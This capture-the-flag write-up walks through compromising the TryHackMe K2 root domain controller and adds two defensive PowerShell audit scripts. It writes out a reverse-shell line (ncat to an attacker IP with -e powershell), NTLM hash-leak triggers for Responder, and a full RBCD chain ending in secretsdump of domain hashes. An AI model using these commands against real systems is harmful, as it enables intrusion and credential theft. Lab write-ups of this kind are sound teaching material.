# The Summit

{% embed url="https://tryhackme.com/r/room/k2room" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

## Recon

We stop the second machine and start the third. Our enumeration process starts all over again. We run another Nmap scan and find several Windows-related ports. We don't have a website this time either, so this seems to be a pure AD machine again.

<figure><img src="/files/YC0zqbGXhlSUlVu2A5kB" alt=""><figcaption></figcaption></figure>

The ports include SMB, RDP, LDAP and Kerberos. After a default service and script scan, we can determine the name of the machine: `K2ROOTDC`. So we now have to compromise the root DC. We add `K2ROOTDC.K2.THM` to our `/etc/hosts` file.

<figure><img src="/files/ysv01MDZYcX9iOOrsz8a" alt=""><figcaption></figcaption></figure>

## Foothold

We use kerbrute again to enumerate possible users and are able to spot `administrator` and `j.smith`.

```
kerbrute -users users.txt -password 'REDACTED' -domain k2.thm
```

<figure><img src="/files/eppoI40iQd68iOgyHKWG" alt=""><figcaption></figcaption></figure>

We try to reuse the hash for the local administrator without success, but are able to log in with it as the user `j.smith`.

<figure><img src="/files/kSq65fvksbHOy3lDFYD3" alt=""><figcaption></figcaption></figure>

## Lateral Movement

{% embed url="https://github.com/BloodHoundAD/SharpHound/releases/tag/v2.5.7" %}

The first attempt to enumerate the root DC with BloodHound used SharpHound. However, I must have used it incorrectly here; at least it could not be found.

<figure><img src="/files/JVC3TZAHyUbxF4RhPand" alt=""><figcaption></figcaption></figure>

Something seems to be wrong, so let's skip it for now and see what we can discover with `j.smith`.

<figure><img src="/files/ustXBHCNQpbpgXr4Du6y" alt=""><figcaption></figcaption></figure>

In the root directory we find a `Scripts` folder containing a `.bat` file that copies a file `notes.txt` to `o.armstrong`'s Documents directory. A service or scheduled task could be running this as `o.armstrong`.

<figure><img src="/files/XSqm0X2O0MVJoZDopWVn" alt=""><figcaption></figcaption></figure>

Unfortunately, we cannot view the scheduled tasks as `j.smith`.

```
schtasks /query /fo LIST /v
```

<figure><img src="/files/kjQR3mruxDna2HqDY0Jf" alt=""><figcaption></figcaption></figure>

If we look at the permissions, we see that we have full access to the `Scripts` folder but cannot write to the file itself.

<figure><img src="/files/iQKZF4yRCI3nr94Ex8aQ" alt=""><figcaption></figcaption></figure>

But we can delete it and replace it with our own file.

<figure><img src="/files/hrqKhp9exKdE3brOkYuR" alt=""><figcaption></figcaption></figure>

We first try to copy the notes into the `Scripts` folder. To do this, we replace the bat file and grant full access permissions to `o.armstrong`.

{% code overflow="wrap" %}

```
Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy C:\Users\o.armstrong\Desktop\notes.txt C:\Scripts\notes.txt'
```

{% endcode %}

```
icacls "C:\Scripts\backup.bat" /grant o.armstrong:F
```

<figure><img src="/files/0gPYhWj3xSzjirhXset4" alt=""><figcaption></figcaption></figure>
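As an added defender-side check, not part of the original writeup: the weakness used above is a scheduled task that runs a script as another account out of a directory in which a low-privileged user may delete or create files, so the read-only script can simply be swapped out. The PowerShell audit below (the function names `Find-SwappableTaskScripts` and `Get-TaskActionPaths` and the `$trusted` list are my own, not from the room) walks every enabled scheduled task on the host, resolves the files its actions execute, and reports any directory ACE that gives a principal outside the trusted list Delete, CreateFiles, Modify or FullControl on that directory. Run it as an administrator on the host being audited; it only reads task definitions and ACLs.

```powershell
# Added audit example, not from the original writeup. Run as an administrator
# on the host being audited; nothing here modifies the system.

# Principals expected to control files under a server's script directories.
# Every other principal with swap rights is reported. Extend for your environment.
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')

# Directory rights that let a caller delete or recreate a file even when the
# file's own ACL forbids writing to it (exactly the situation in the writeup).
$swapMask = [int][System.Security.AccessControl.FileSystemRights]'Delete, DeleteSubdirectoriesAndFiles, CreateFiles, Modify, FullControl'
$swapMask = $swapMask -bor 0x10000000 -bor 0x40000000   # GENERIC_ALL / GENERIC_WRITE bits seen on some inherited ACEs

function Get-TaskActionPaths {
    # Returns the on-disk files a task's actions execute: the Execute target plus
    # any argument token that looks like an absolute path and exists as a file.
    param($Task)
    foreach ($action in $Task.Actions) {
        if (-not $action.Execute) { continue }   # COM handler / e-mail actions carry no path
        $exe = [Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"'))
        if (Test-Path -LiteralPath $exe -PathType Leaf) { $exe }
        if (-not $action.Arguments) { continue }
        foreach ($token in ($action.Arguments -split '\s+')) {
            $candidate = [Environment]::ExpandEnvironmentVariables($token.Trim('"'))
            if ($candidate -match '^[A-Za-z]:\\' -and (Test-Path -LiteralPath $candidate -PathType Leaf)) {
                $candidate
            }
        }
    }
}

function Find-SwappableTaskScripts {
    # For each enabled task, check whether a principal outside $trusted holds
    # rights on the action file's directory that allow replacing the file.
    $findings = foreach ($task in (Get-ScheduledTask | Where-Object State -ne 'Disabled')) {
        foreach ($path in (Get-TaskActionPaths -Task $task)) {
            $dir = Split-Path -Parent $path
            $acl = Get-Acl -LiteralPath $dir
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -ne 'Allow') { continue }
                if ($trusted -contains $ace.IdentityReference.Value) { continue }
                if (([int]$ace.FileSystemRights -band $swapMask) -eq 0) { continue }
                [pscustomobject]@{
                    Task      = $task.TaskPath + $task.TaskName
                    RunsAs    = $task.Principal.UserId
                    File      = $path
                    Directory = $dir
                    Principal = $ace.IdentityReference.Value
                    Rights    = $ace.FileSystemRights
                }
            }
        }
    }
    $findings
}

Find-SwappableTaskScripts | Format-Table -AutoSize
```

A hit where `RunsAs` is a different account than the `Principal` is the pattern from this room. The fix is to give the directory the same restrictive ACL as the script (remove Delete and CreateFiles for non-administrators) or move scheduled scripts under a directory only administrators can modify, and to run such tasks under the least-privileged account that can do the job.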

After a short time, we have the notes, but they don't get us anywhere.

<figure><img src="/files/aNLRXVkYHQj4GGFsGy2u" alt=""><figcaption></figcaption></figure>

We repeat the step to get the user flag and are successful.

{% code overflow="wrap" %}

```
Set-Content -Path "C:\Scripts\backup.bat" -Value 'copy C:\Users\o.armstrong\Desktop\user.txt C:\Scripts\user.txt'
```

{% endcode %}

<figure><img src="/files/qiuoqSJkEulkFlxiU6hN" alt=""><figcaption></figcaption></figure>

Now we replace it with a reverse shell, using a netcat executable so as not to trigger the AV.

{% hint style="info" %}
I had ncat.exe lying around; I am not sure whether it came from the following source.

It is not necessary to get a reverse shell to retrieve `o.armstrong`'s hash for the further escalation steps.\
Alternatively, the bat file can be modified directly to retrieve the hash of `o.armstrong`. To do this, set up Responder using `sudo responder -I tun0` and write `net use \\10.8.211.1\share` into the bat file. After a short time you will get the hash, which saves some steps.
{% endhint %}

{% embed url="https://github.com/int0x33/nc.exe/" %}

We upload ncat.exe to `C:\Scripts` using evil-winrm.

<figure><img src="/files/kXdkvsJlQFWMYaSJ5b7a" alt=""><figcaption></figcaption></figure>

Start a listener.

<figure><img src="/files/6LvCDpF1lbSkpwsSFG0x" alt=""><figcaption></figcaption></figure>

And replace the .bat.

{% code overflow="wrap" %}

```
Set-Content -Path "C:\Scripts\backup.bat" -Value 'C:\Scripts\.\ncat.exe 10.8.211.1 4444 -e powershell'
```

{% endcode %}

After a short while we receive a connection back as `o.armstrong`.

<figure><img src="/files/lHVop7kRyUlhiwZp1LR7" alt=""><figcaption></figcaption></figure>

Now we can inspect the scheduled task.

```
schtasks /query /fo LIST /v
```

<figure><img src="/files/48sWNDpzLrCxjOPICQAH" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

Next we want to use bloodhound-python to retrieve valuable information about the AD and find an exploitation path. As already mentioned, we weren't successful with SharpHound.exe. We set up DNSChef first, since bloodhound-python can run into name-resolution problems if the name server does not resolve the domain properly. DNSChef is a DNS proxy tool used for DNS spoofing, allowing users to intercept and modify DNS requests. It can be used in penetration testing to redirect traffic or simulate malicious DNS responses for specific domains.

<figure><img src="/files/pc5Hb1aW8qDr0eqR7N9v" alt=""><figcaption></figcaption></figure>

Next we run bloodhound-python as the user j.smith, passing his hash.

{% code overflow="wrap" %}

```
bloodhound-python -d k2.thm -c All -u 'j.smith' --hashes 'REDACTED:REDACTED' -dc k2.thm -ns 127.0.0.1
```

{% endcode %}

<figure><img src="/files/HQT3tnz26VHEctGT9fa1" alt=""><figcaption></figcaption></figure>

We see that our compromised user `o.armstrong` is a member of the group IT DIRECTOR.

<figure><img src="/files/gvrAK0tN3kdxcYG8Lkfw" alt=""><figcaption></figcaption></figure>

By querying for the shortest path to high-value targets, we see that this group has generic write (GenericWrite) permissions on the machine.

<figure><img src="/files/s5vgVGvXhFGqfd4osEAS" alt=""><figcaption></figcaption></figure>

By right-clicking on the edge we see an exploitation path. For this we need the credentials of `o.armstrong`.

<figure><img src="/files/qRSm8MtmtV5bJ19ziUtx" alt=""><figcaption></figcaption></figure>

We can actually try to get them by stealing his NTLM hash using Responder. The command `sudo responder -I tun0` starts the Responder tool, which captures and responds to network authentication requests such as SMB and NetBIOS. The `-I tun0` option makes it listen on the `tun0` network interface, typically used for VPN connections or tunneling, to capture credentials or perform other attacks on that network segment.

```
sudo responder -I tun0
```

<figure><img src="/files/ID98luMQsykYhPUu8uQV" alt=""><figcaption></figcaption></figure>

From this blog post we learn how to trigger a request to our Responder instance that leaks a hash.

{% embed url="https://www.securify.nl/en/blog/living-off-the-land-stealing-netntlm-hashes/" %}

We request the following address:

```
curl file://10.8.211.1/leak.leak.html
```

<figure><img src="/files/7iLWljyAURbTArzrgtJ6" alt=""><figcaption></figcaption></figure>

Capture the hash...

<figure><img src="/files/Ii1k9BlpVEUYUoF8mfsy" alt=""><figcaption></figcaption></figure>

... and crack it. We got the password for `o.armstrong`.

<figure><img src="/files/UosxLWDCjHd20kcms5Aw" alt=""><figcaption></figcaption></figure>

Again, shoutout to Jaxafed for discussing the following exploit chain, since the initial approach did not work properly. The following commands were provided by Jaxafed. In the end, the **SAMR (Security Account Manager Remote)** method turned out to be the problem solver.

In this exploit chain a computer account named `ATTACKERSYSTEM$` is added to the K2.THM domain using the SAMR method with the provided credentials. The attacker then uses the RBCD (Resource-Based Constrained Delegation) technique to configure `K2ROOTDC$` so that `ATTACKERSYSTEM$` is allowed to delegate to it. Next, the attacker impersonates `Administrator` to request a Kerberos service ticket for the `cifs` service on the domain controller. Finally, the secretsdump tool uses that Kerberos ticket (ccache) to extract password hashes from the domain controller without needing a password.

A deep dive into RBCD exploitation can be found here:

{% embed url="https://medium.com/@offsecdeer/a-practical-guide-to-rbcd-exploitation-a3f1a47267d5" %}

{% code overflow="wrap" %}

```
addcomputer.py -method SAMR -computer-name 'ATTACKERSYSTEM$' -computer-pass 'Summer2018!' -dc-host K2ROOTDC.K2.THM -domain-netbios K2.THM 'K2.THM/o.armstrong:REDACTED'
```

{% endcode %}

{% code overflow="wrap" %}

```
rbcd.py -delegate-from 'ATTACKERSYSTEM$' -delegate-to 'K2ROOTDC$' -action 'write' 'K2.THM/o.armstrong:REDACTED'
```

{% endcode %}

{% code overflow="wrap" %}

```
getST.py -spn 'cifs/K2ROOTDC.k2.thm' -impersonate 'Administrator' 'K2.THM/attackersystem$:Summer2018!'
```

{% endcode %}

```
export KRB5CCNAME=Administrator.ccache
```

{% code overflow="wrap" %}

```
secretsdump.py -k -no-pass 'K2.THM/Administrator@k2rootdc.k2.thm'
```

{% endcode %}

<figure><img src="/files/p5fRmKoRCKk6eBjRymAs" alt=""><figcaption></figcaption></figure>
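As an added defender-side check, not part of the original writeup or of the impacket tools: the chain above only works because three conditions hold at once, namely a non-zero `ms-DS-MachineAccountQuota` (which lets `addcomputer.py` create `ATTACKERSYSTEM$`), a write right on the DC's computer object (the GenericWrite edge BloodHound showed for IT DIRECTOR), and the resulting `msDS-AllowedToActOnBehalfOfOtherIdentity` entry that `rbcd.py` writes. The PowerShell below (the function names `Get-MachineAccountQuota`, `Get-RbcdDelegations` and `Get-DcWriteRights` are my own) audits all three with the ActiveDirectory module on a domain-joined admin host; domain and DC names are read from AD, not hardcoded.

```powershell
# Added audit example, not from the original writeup. Requires the RSAT
# ActiveDirectory module; read-only except for the commented remediation lines.
Import-Module ActiveDirectory

function Get-MachineAccountQuota {
    # ms-DS-MachineAccountQuota: how many computer accounts any authenticated
    # user may create. The default of 10 is what the addcomputer step relies on.
    $domain = Get-ADDomain
    $obj = Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota'
    [int]$obj.'ms-DS-MachineAccountQuota'
}

function Get-RbcdDelegations {
    # Objects whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated, decoded
    # into the principals allowed to delegate to them (what rbcd.py -action write sets).
    $attr = 'msDS-AllowedToActOnBehalfOfOtherIdentity'
    foreach ($obj in (Get-ADObject -LDAPFilter "($attr=*)" -Properties $attr, objectClass)) {
        $raw = $obj.$attr
        # The AD module normally hands back an ActiveDirectorySecurity; decode if it is raw bytes.
        if ($raw -is [byte[]]) {
            $sd = New-Object System.DirectoryServices.ActiveDirectorySecurity
            $sd.SetSecurityDescriptorBinaryForm($raw)
        } else {
            $sd = $raw
        }
        foreach ($ace in $sd.Access) {
            [pscustomobject]@{
                Target            = $obj.Name
                Class             = $obj.ObjectClass
                AllowedToDelegate = $ace.IdentityReference.Value
                Rights            = $ace.ActiveDirectoryRights
            }
        }
    }
}

function Get-DcWriteRights {
    # Non-default principals with unscoped write rights (GenericAll, GenericWrite,
    # WriteProperty on all attributes, WriteDacl, WriteOwner) on a DC computer object.
    # Property-scoped ACEs (ObjectType set) are skipped to keep the output short.
    $netbios = (Get-ADDomain).NetBIOSName
    $ignore = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'BUILTIN\Administrators',
                "$netbios\Domain Admins", "$netbios\Enterprise Admins", "$netbios\Domain Controllers")
    $writeMask = [int][System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteProperty, WriteDacl, WriteOwner'
    foreach ($dc in (Get-ADDomainController -Filter *)) {
        $acl = Get-Acl -Path ("AD:\" + $dc.ComputerObjectDN)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($ace.ObjectType -ne [guid]::Empty) { continue }
            if ($ignore -contains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.ActiveDirectoryRights -band $writeMask) -eq 0) { continue }
            [pscustomobject]@{ DC = $dc.Name; Principal = $ace.IdentityReference.Value; Rights = $ace.ActiveDirectoryRights }
        }
    }
}

"ms-DS-MachineAccountQuota: $(Get-MachineAccountQuota)  (0 blocks the addcomputer step)"
Get-RbcdDelegations | Format-Table -AutoSize
Get-DcWriteRights   | Format-Table -AutoSize

# Remediation, commented out so the audit stays read-only:
#   Set-ADDomain -Identity (Get-ADDomain) -Replace @{'ms-DS-MachineAccountQuota'='0'}
#   Set-ADComputer -Identity <dc-name> -PrincipalsAllowedToDelegateToAccount $null
```

In this room the `Get-DcWriteRights` output would show the IT DIRECTOR group on `K2ROOTDC`, which is the root cause to remove; the quota and the delegation entry are the two symptoms the chain leaves behind, and a populated `msDS-AllowedToActOnBehalfOfOtherIdentity` on a domain controller is almost never legitimate.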

With the extracted hash of `administrator` we are able to log in and retrieve the final flag.

<figure><img src="/files/jsEsOeRxFtfeDwftRsbA" alt=""><figcaption></figcaption></figure>